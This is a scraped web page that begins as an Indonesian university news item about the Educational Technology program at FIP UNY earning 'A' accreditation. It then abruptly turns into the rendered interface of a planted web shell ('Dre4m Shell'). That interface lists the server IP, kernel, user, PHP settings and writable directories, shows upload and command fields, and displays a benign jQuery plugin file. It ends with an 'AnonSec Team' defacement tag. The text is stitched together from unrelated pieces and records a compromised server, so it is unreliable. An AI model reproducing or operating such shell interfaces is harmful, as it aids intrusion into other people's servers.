Sesuai dengan Surat Keputusan Badan Akreditasi Nasional Perguruan Tinggi (BAN-PT) Nomor 1151/SK/BAN-PT/Akred/S/Xl/2015, prodi Teknologi Pendidikan FIP UNY memperoleh nilai Akreditasi A (skor 367). Hasil ini tentu saja sangat membanggakan karena sebelumnya prodi TP berakreditasi B. Perlu diketahui bahwa rangkaian akreditasi ini membutuhkan tenaga serta pikiran, dari awal penyusunan borang sampai dengan visitasi. Oleh karena itu Ketua Jurusan KTP Dr. Sugeng Bayu Wahyono, M.Si. atas nama Jurusan mengucapkan terimakasih kepada semua pihak yang telah membantu dan mendukung proses akreditasi, baik Jajaran Dekanat FIP, Bapak Ibu Kasubag, dosen, karyawan, serta para alumni dan mahasiswa.

Akreditasi Program Studi yang dilakukan oleh  BAN-PT dalam rangka mengevaluasi dan menilai, serta menetapkan status dan  peringkat mutu program studi berdasarkan standard mutu yang telah ditetapkan. Akreditasi merupakan syarat mutlak yang harus dipenuhi oleh setiap Prodi agar dapat menjadi tolok ukur di dalam memberikan pelayanan pendidikan yang lebih bermutu kepada masyarakat.

Jurusan KTP FIP UNY akan berkomitmen untuk mempertahankan peringkat akreditasi ini, dengan upaya menjaga dan meningkatkan kualitas pelayanan kepada mahasiswa, masyarakat, serta stakeholder. /jz

Dre4m Was Here
Dre4m Shell
Server IP : 10.11.12.9  /  Your IP : 18.188.96.76
Web Server : nginx/1.27.3
System : Linux 610f24998324 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64
User : www-data ( 1004)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /public_html/misc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /public_html/misc/jquery.once.js
/**
 * jQuery Once Plugin v1.2
 * http://plugins.jquery.com/project/once
 *
 * Dual licensed under the MIT and GPL licenses:
 *   http://www.opensource.org/licenses/mit-license.php
 *   http://www.gnu.org/licenses/gpl.html
 */

(function ($) {
  var cache = {}, uuid = 0;

  /**
   * Filters elements by whether they have not yet been processed.
   *
   * @param id
   *   (Optional) If this is a string, then it will be used as the CSS class
   *   name that is applied to the elements for determining whether it has
   *   already been processed. The elements will get a class in the form of
   *   "id-processed".
   *
   *   If the id parameter is a function, it will be passed off to the fn
   *   parameter and the id will become a unique identifier, represented as a
   *   number.
   *
   *   When the id is neither a string or a function, it becomes a unique
   *   identifier, depicted as a number. The element's class will then be
   *   represented in the form of "jquery-once-#-processed".
   *
   *   Take note that the id must be valid for usage as an element's class name.
   * @param fn
   *   (Optional) If given, this function will be called for each element that
   *   has not yet been processed. The function's return value follows the same
   *   logic as $.each(). Returning true will continue to the next matched
   *   element in the set, while returning false will entirely break the
   *   iteration.
   */
  $.fn.once = function (id, fn) {
    if (typeof id != 'string') {
      // Generate a numeric ID if the id passed can't be used as a CSS class.
      if (!(id in cache)) {
        cache[id] = ++uuid;
      }
      // When the fn parameter is not passed, we interpret it from the id.
      if (!fn) {
        fn = id;
      }
      id = 'jquery-once-' + cache[id];
    }
    // Remove elements from the set that have already been processed.
    var name = id + '-processed';
    var elements = this.not('.' + name).addClass(name);

    return $.isFunction(fn) ? elements.each(fn) : elements;
  };

  /**
   * Filters elements that have been processed once already.
   *
   * @param id
   *   A required string representing the name of the class which should be used
   *   when filtering the elements. This only filters elements that have already
   *   been processed by the once function. The id should be the same id that
   *   was originally passed to the once() function.
   * @param fn
   *   (Optional) If given, this function will be called for each element that
   *   has not yet been processed. The function's return value follows the same
   *   logic as $.each(). Returning true will continue to the next matched
   *   element in the set, while returning false will entirely break the
   *   iteration.
   */
  $.fn.removeOnce = function (id, fn) {
    var name = id + '-processed';
    var elements = this.filter('.' + name).removeClass(name);

    return $.isFunction(fn) ? elements.each(fn) : elements;
  };
})(jQuery);

Anon7 - 2022
AnonSec Team